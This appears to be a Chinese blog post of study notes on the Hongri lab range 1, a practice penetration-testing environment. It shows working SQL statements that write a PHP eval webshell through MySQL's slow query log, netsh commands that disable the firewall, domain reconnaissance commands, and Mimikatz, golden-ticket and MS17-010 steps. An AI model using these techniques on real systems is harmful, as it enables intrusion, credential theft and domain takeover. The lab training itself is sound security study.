红日靶场1学习笔记

一、准备工作

1、靶场搭建

靶场地址

靶场描述
靶场拓扑图

其他相关靶场搭建详情见靶场地址相关说明

2、靶场相关主机信息

后续打靶场的过程中,如果不是短时间内完成,可能ip会有变化

主机 ip 密码 角色
win7 192.168.122.131 hongrisec@2019! 边界服务器
win7 192.168.52.143 hongrisec@2019! 边界服务器
win2008 192.168.52.138 hongrisec@2019# 域控
win2003 192.168.52.141 hongrisec@2019! 域成员
kali 192.168.122.128 攻击机1
win11 192.168.122.1 攻击机2

3、环境配置启动

启动win7的phpstudy
win 7能通域内其他主机和互联网

win2008 不能通互联网

二、web渗透

1、IP及端口的探测

goby、nmap都可以

2、访问相关端口,可以发现phpinfo页面

3、进一步进行目录爆破,发现phpmyadmin目录

其他相关文章还写到扫出来了备份文件,对后续文件上传拿到文件路径有帮助,但是我这边没有扫出来,和字典有关

4、通过弱口令登录phpmyadmin,弱口令root:root

5、先修改一下弱口令

如果是攻防赛中可以进行这一步,这里有点多余了

6、百度大法,发现可以通过数据库写入webshell

phpMyAdmin 渗透利用总结

法一:

直接往web目录下写入webshell

需要的条件:a、有权限写 b、知道web目录绝对路径

查看当前数据库用户是否有写的权限

show variables like '%secure%';

secure-file-priv特性:

secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下

当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制

可以在mysql-ini文件中设置其属性
此处权限为默认NULL,不允许导入导出文件,另寻他法

补充:

如何设置这一属性?

法二:通过日志文件写入webshell

条件:日志读写权限+web目录的绝对路径

查看当前选项值

show global variables like '%long_query_time%'

开启日志记录功能

set global general_log = "ON";

查看当前日志文件

show variables like 'general%';

指定日志文件,相关路径phpinfo页面可以看到

set global general_log_file = " C:/phpStudy/WWW/zshell.php";

无法设置日志文件,另寻他法

法三:

尝试通过慢日志写入webshell

慢日志:一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。

查询当前慢查询日志目录

show variables like '%slow%';

开启慢查询日志记录功能

set GLOBAL slow_query_log=on;

指定慢查询日志文件

这里就可以成功,为啥上面不能成功?

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/zshell.php';

向慢查询日志中写入phpinfo页面

select "<?php phpinfo();?>" or sleep(11);

查看该日志文件可以成功被解析
进一步写入webshell

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
select "<?php @eval($_POST['cmd']);?>" or sleep(11);

用蚁剑成功连接webshell

至此,通过phpmyadmin获取到了web服务器的相关权限

http服务和数据库肯定是为网站服务的

发现数据库中存在newyxcms数据库,搜索相关信息,可以在网上发现源码和相关漏洞

7、访问相关web页面,进一步挖掘漏洞

前面修改了数据库的密码导致访问报错,又重新修改了密码

http://192.168.122.131/yxcms/
通过公告信息,进入后台(默认弱口令)

前台模板管理处新建模板文件写入webshell进行漏洞利用
webshell 路径可以在公开源码中查看相关文件获取,也可以通过前面扫出来的网站源码获取,此处的版本和靶机cms的版本不同,但是文件路径一样,最好找相同版本的源码
通过蚁剑连接webshell

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/55655708ce4748e484611caef6416f8b.png)

留言板存在存储型xss,后台审核可触发
其他文章中还提到了一个sql 注入漏洞,感兴趣的可以自行研究

三、后渗透

主要思路:通过cs生成木马上传到网站服务器进行下一步渗透,如域渗透和横向移动,权限提升和维持

1、通过蚁剑连接后,关闭防火墙

以防对后续测试造成影响,靶场有时候也很玄学

netsh advfirewall show allprofile state                   查看防火墙状态
netsh advfirewall set allprofiles state off 			   关闭防火墙

2、通过cs生成木马并用蚁剑上传到网站服务器上

在cmd 中运行木马

3、主机上线后抓取用户名密码,进行内网存活主机端口扫描

抓取主机用户名密码,点击Run Mimikatz

还可以直接进行提权
主机相关信息收集

net group /domain          域内用户列表

net group "domain computers" /domain    域内计算机列表

net group "domain admins" /domain       域内管理员列表

hostname                                本机名称
net time /domain
查看时间,通过域控获取的时间,可以看到域控的主机名,ping一下可以获取域控的ip

net view
可以看到域里面的用户,ping 一下可以获取相关的ip

内网主机端口扫描
发现存在另外两台主机:192.168.52.138、192.168.52.141
查看域控,发现owa为域控

四、横向移动

1、搭建代理,进行端口转发

kali上开启frp 服务端
将客户端通过蚁剑上传到win7上,但是一直无法启动
看其他人可以成功,不知道什么问题,上传了这个dll文件也不行

2、通过SMB Beacon达到通内网的目的

网上说这是一个很隐蔽,可以绕过防火墙的好方法,咱也不懂,咱也不敢问

SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信

对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
参考链接

创建一个新的SMB监听器

选择138的主机进行横向移动

138的主机成功上线,同样抓取密码,关闭防火墙

3、权限维持(黄金票据)

把SID,域名,复制下来等下黄金票据要用

  hash:58e91a5ac358d86513ab224312314061:::

   SID: S-1-5-20

   域名:GOD.ORG

通过黄金票据提权
原理链接
回头再详细研究吧,先照猫画虎

右键->access->golden ticket

基本上可以通过CS 一把梭了,怪不得说CS是神器

4、cs与msf 联动进行漏洞利用

其实不用cs直接用msf也可以达到目的,不过是各有各的优势,组合起来各取所长

kali端

cs端


获取msf反弹shell,设置代理隧道,使得msf能够通过win7路由转发访问192.168.25.0/24网段

shell     #相当于cmd
chcp 65001    #解决乱码
arp -a    #查看主机arp表信息

建隧道
进一步利用ms17_010漏洞来探测攻击
同样也发现141主机存在相同漏洞
结束语:写到这里就结束了,一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!

每日名言:

别问兜里还有多少钱,就问你的青春还都多少年

苦难是生命的防沉迷系统

很多人看不到未来,其实是看到了未来

回忆不过是在时间的长河里刻舟求剑

我最新的照片,其实是我最老的照片

参考文章:

https://blog.csdn.net/qq_41821603/article/details/109948920

https://cloud.tencent.com/developer/article/1595245

https://blog.csdn.net/qq_52849046/article/details/139163010

https://blog.csdn.net/m0_66638011/article/details/139727914?spm=1001.2101.3001.6661.1\&utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~baidujs_baidulandingword~Ctr-1-139727914-blog-136015522.235^v43^pc_blog_bottom_relevance_base1\&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~baidujs_baidulandingword~Ctr-1-139727914-blog-136015522.235^v43^pc_blog_bottom_relevance_base1\&utm_relevant_index=1

相关推荐
王俊山IT15 分钟前
C++学习笔记----10、模块、头文件及各种主题(一)---- 模块(5)
开发语言·c++·笔记·学习
Mephisto.java1 小时前
【大数据学习 | kafka高级部分】kafka中的选举机制
大数据·学习·kafka
Yawesh_best1 小时前
思源笔记轻松连接本地Ollama大语言模型,开启AI写作新体验!
笔记·语言模型·ai写作
南宫生1 小时前
贪心算法习题其三【力扣】【算法学习day.20】
java·数据结构·学习·算法·leetcode·贪心算法
长弓三石2 小时前
鸿蒙网络编程系列44-仓颉版HttpRequest上传文件示例
前端·网络·华为·harmonyos·鸿蒙
xianwu5432 小时前
反向代理模块
linux·开发语言·网络·git
follycat2 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
武子康3 小时前
大数据-212 数据挖掘 机器学习理论 - 无监督学习算法 KMeans 基本原理 簇内误差平方和
大数据·人工智能·学习·算法·机器学习·数据挖掘
xiaoxiongip6663 小时前
HTTP 和 HTTPS
网络·爬虫·网络协议·tcp/ip·http·https·ip
JaneJiazhao3 小时前
HTTPSOK:智能SSL证书管理的新选择
网络·网络协议·ssl